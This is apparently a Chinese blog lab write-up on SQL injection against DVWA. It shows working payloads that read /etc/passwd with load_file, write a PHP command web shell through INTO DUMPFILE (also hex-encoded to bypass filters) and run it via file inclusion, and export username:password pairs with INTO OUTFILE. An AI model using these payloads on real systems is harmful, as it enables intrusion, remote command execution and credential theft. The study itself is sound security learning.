SQL注入学习二

最新推荐文章于 2022-04-18 23:11:52 发布
最新推荐文章于 2022-04-18 23:11:52 发布
阅读量420 收藏 1
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jia304349145/article/details/77855546
版权

本次记录:SQL注入除了可以拖库,还可以做什么。SQL注入的利用方法

1. 读取文件

利用dbms中的load_file() 函数可以读取系统中的文件。
利用burp suite进行注入。
设置好代理之后,使用burp suite进行拦截,Ctrl+R将request发送到Repeater中。
这里写图片描述
这里的id就是我们要注入的参数。
Value中输入
' union select null, load_file('/etc/passwd') --
可以看到读取到了/etc/passwd的内容
这里写图片描述

2. 写入文件

主要利用into dumpfile 将要传的文件dump到本地。
在Value值中输入(into dumpfile后没有指定路径):
' union select null, "<?php passthru($_GET['cmd']);?>" into dumpfile "a.php"
这里写图片描述
文件上传成功,由于我们没有指定dump到的文件路径,因此我们远程登录到目标主机,查找一下文件位置。
这里写图片描述
自动保存到了/var/lib/mysql/dvwa/a.php ,然而使用msfadmin的权限是无法访问dvwa文件夹的,因为dvwa的所有者和所属组均为mysql,因此即使我们将文件写入到了目标服务器,仍然无法利用。
这里写图片描述
基于这种情况,一般将文件写入到/tmp 目录下。因为这个目录所有用户均具有读写权限。
这里写图片描述
' union select null, "<?php passthru($_GET['cmd']);?>" into dumpfile "/tmp/a.php"
这里写图片描述
上传成功。
此时我们可以利用系统的文件包含漏洞:
这里写图片描述
可以成功执行命令。
这里写图片描述
这里又出现了一个问题,如果服务器对我们的输入进行了过滤,比如过滤了< 将会导致我们的注入无效,这是用需要利用编码,绕过后台服务器的过滤。本次介绍使用二进制编码。
将一句话木马存入c.php
<?php passthru($_GET['cmd']);?>
这里写图片描述
然后进行编码
cat c.php | xxd -ps | tr -d '\n'
这里写图片描述

  • xxd命令:对于标准输入或者给定的文件,显示其16进制的内容。也可以反过来进行转换。
  • tr命令:可以对来自标准输入的字符进行替换、压缩和删除。它可以将一组字符变成另一组字符,经常用来编写优美的单行命令,作用很强大。

复制十六进制的内容到burp suite中进行注入,同样可以注入。
' union select null, (0x3c3f7068....) into dumpfile "/tmp/c.php" --
这里写图片描述

3. 保存下载数据库

主要利用into outfile 将从数据库中查询到的结果输出到本地。同样利用文件包含漏洞。
' union select null, concat(user, 0x3a, password) from users into outfile "/tmp/a.db"
这里写图片描述

Elvirajia
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全--SQL注入读写文件
weixin_43774199的博客
09-24 698
课程任务:讲解MySQL读写文件的条件,教会学生配置MySQL的导入导出功能和用户权限的修改。组织实验使学生掌握load_file()、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 任务目标:了解MySQL读写文件的条件,学会配置MySQL的导入导出功能和用户权限的修改,掌握load_file、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 A.读写文件的基本条件和使用 SQL注入文件读写 SQL注入有直接
web渗透——SQL注入文件dump
王嘟嘟的博客
04-15 907
0x00前言 这次注入主要是针对PHP来说的。如果通过dump错误命令来进行错误盲注。 0x01 前置知识 outfile函数 说明 将表的内容到处为一个文本文件。 格式 select [列名] FROM table [where 语句] into outfile ‘目标文件’ [OPTION] dumpfile 将表的内容导出为一个文本文件,一次到处一行 load_f...
过滤列名如何注入dump数据
Assassin
11-21 763
这是一个非常神奇的东西,在做LCTF中大牛提及的DDCTF2017中的一个题目,废话不多少,直接放出来效果及其利用语句mysql> select * from (select 1)a,(select 2)b,(select 3)c; +---+---+---+ | 1 | 2 | 3 | +---+---+---+ | 1 | 2 | 3 | +---+---+---+ 1 row in set
SQL学习 之 into outfile 和 into dumpfile
baynk的博客
03-31 5480
在学sqlmap的时候发现,写文件不用into outfile用的却是into dumpfile于是去查了一波。 the SELECT ... INTO form of SELECT enables a query result to be stored in variables or written to a file: SELECT ... INTO var_list selects col...
SQL考点之解锁,备份与恢复
guangod的博客
09-22 215
如题:2019年10月: 详见:P168 所以,答案选C. 注:根据计划,遇到这种语法题要深挖些,SQL语句所解决的问题,及实际常用用法。这里涉及到备份与恢复。 关于备份与恢复,没有书上的描述,也是很好理解的。写程序备份到github,当改动较多,不知道改哪里时,就再恢复遍程序。这样避免大量重复的工作,更何况是数据库,有备份与恢复是很正常的。买移动硬盘时,上面都会写着“硬盘有价,数据无价”,可见,数据的价值。 先看下书上列出的考点: SELECT INTO…OUTFILE语句把表数据导...
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL 语句内容:熟悉 MySQL 的一些基本语句,如 SELECT、INSERT、UPDATE、DELETE 等。 3. MySQL 数据库结构...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
SQL注入天书 sqli-labs
01-11
sqli-labs是一个精心设计的在线实验室,它包含了多个级别的SQL注入练习,从基础到高级,逐步引导学习者掌握不同类型的SQL注入技巧。每个级别都有详细的说明和解题提示,帮助学习者理解漏洞的成因和利用方法,以及...
sql注入网站源码
04-09
2. **防止SQL注入**:最有效的防御方法是使用参数化查询或预编译的SQL语句。在ASP中,可以使用ADO(ActiveX Data Objects)的Command对象和参数,这样用户输入的数据不会影响SQL结构。此外,应避免使用动态SQL,尽...
使用SQLfile 语句从dump文件中抽取DDL语句
文档搬运工
03-13 3103
RDBMS 11.2.0.4[oracle@test02 ~]$ impdp \"/ as sysdba\" dumpfile=dump:dump_query.dmp logfile=dump:impsql.log sqlfile=dump:imp.sql Import: Release 11.2.0.4.0 - Production on Tue Mar 13 14:09:53 2018 C...
mysql注入中的outfiledumpfile、load_file函数详解
whatday的专栏
10-29 3296
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
sqlserver生成dump文件的方法汇总
一只猿的自我修养
03-04 5120
sqlserver生成dump文件的方法汇总 http://www.yiiyee.cn/Blog/windbg/ http://www.cnblogs.com/Clingingboy/archive/2013/03/26/2983166.html http://troubleshootingsql.com/tag/stack-dump/ http://mssqlwiki.com/2012/...
MySql数据库备份与恢复——使用mysqldump 导入与导出方法总结
热门推荐
helloxiaozhe的博客
08-29 28万+
MySql数据库备份与恢复——使用mysqldump 导入与导出方法总结 mysqldump客户端可用来转储数据库或搜集数据库进行备份或将数据转移到另一个sql服务器(不一定是一个mysql服务器)。 转储包含创建表和/或装载表的sql语句。 ps、如果在服务器上进行备份,并且表均为myisam表,应考虑使用mysqlhotcopy,因为可以更快地进行备份和恢复。 本文从三部分介绍了mys...
[20][03][40] MySQL 注入的 outfile/dumpfile/load_file 函数详解
安全新司机
08-26 440
文章目录1. 读写文件函数调用的限制2. dumpfile 与 outfile 的区别3. 写入 webshell 或者 udf 下的差异 在利用 sql 注入漏洞后期,最常用的就是通过 mysqlfile 系列函数来进行读取敏感文件或者写入 webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 测试如下 1. 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secu
SQL语法——mysqldump 备份工具
吴声子夜歌的博客
04-18 948
mysqldump 备份工具 MySQL GUI工具(如phpMyAdmin,SQLyog等)通常可以轻松地为备份MySQL数据库提供功能。但是,如果您的数据库很大,备份过程可能会非常慢,因为备份文件需要通过网络传输到客户端PC。结果,备份过程增加了MySQL数据库服务器的锁定和可用时间。 MySQL提供了一个非常有用的工具,可以非常快速地在服务器上本地备份或转储MySQL数据库。备份文件存储在服务器的文件系统中,因此您只需在需要时下载它。 备份MySQL数据库的工具是mysqldump。它位于MySQL
sql注入——读写文件
cxrpty的博客
02-10 3403
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中 1.secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进...
sqli-labs Less-7 Dump into outfile sql注入读写文件
bigblue00的博客
06-16 1690
Less-7 Dump into outfile sql注入读写文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入读写文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
SQL注入学习指南:Sqli-labs实战教程
"《SQL注入天书》是一本由Lcamry编写的关于MySQL注入技术的学习指南,发布于2016年7月。该文档旨在帮助读者深入了解SQL注入原理、实战技巧以及渗透测试中的相关知识。SQL注入是一种常见的网络安全漏洞,黑客通过构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值